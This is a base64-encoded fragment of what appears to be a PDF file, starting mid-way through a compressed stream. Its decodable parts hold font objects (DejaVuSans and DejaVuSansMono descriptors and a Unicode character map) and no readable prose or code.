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gMCA+PgovRm9udERlc2NyaXB0b3IgMjAgMCBSCi9DSURUb0dJRE1hcCAvSWRlbnRpdHkKL0RXIDYwMiA+PgplbmRvYmoKMjMgMCBvYmoKPDwgL0xlbmd0aCA4NjggPj4Kc3RyZWFtCi9DSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNvdXJjZSBiZWdpbgoxMiBkaWN0IGJlZ2luCmJlZ2luY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKFVDUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYKL0NNYXBOYW1lIC9BZG9iZS1JZGVudGl0eS1VQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxGRkZGPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJlZ2luYmZyYW5nZQo8MDAwMD4gPDAwMDA+IDwwMDAwPgo8MDAwMT4gPDAwNDg+IFs8MDA1Mz4gPDAwNzU+IDwwMDYyPiA8MDA2QT4gPDAwNjU+IDwwMDYzPiA8MDA3ND4gPDAwM0E+IDwwMDA5PiA8MDA2Rj4gPDAwNkQ+IDwwMDZFPiA8MDA0RT4gPDAwNjE+IDwwMDNEPiA8MDAzMT4gPDAwMzA+IDwwMDJFPiA8MDAzND4gPDAwMzc+IDwwMDM4PiA8MDAyRj4gPDAwNzI+IDwwMDY3PiA8MDA2OT4gPDAwN0E+IDwwMDQ5PiA8MDA1Nz4gPDAwNjQ+IDwwMDczPiA8MDA1MD4gPDAwNzk+IDwwMDRDPiA8MDA0Rj4gPDAwNzY+IDwwMDY4PiA8MDA1Rj4gPDAwNDE+IDwwMDU1PiA8MDA0Nj4gPDAwNkM+IDwwMDQ0PiA8MDAyRD4gPDAwNDI+IDwwMDQ1PiA8MDA0Nz4gPDAwNDg+IDwwMDUyPiA8MDA1Nj4gPDAwNTQ+IDwwMDRCPiA8MDA1OT4gPDAwMzM+IDwwMDQzPiA8MDA1QT4gPDAwNTg+IDwwMDZCPiA8MDAzNT4gPDAwMzk+IDwwMDUxPiA8MDA3Nz4gPDAwMzI+IDwwMDc4PiA8MDAzNj4gPDAwMkI+IDwwMDRBPiA8MDA0RD4gPDAwNzE+IDwwMDcwPiA8MDA2Nj4gPDAwMjg+IDwwMDI5PiBdCmV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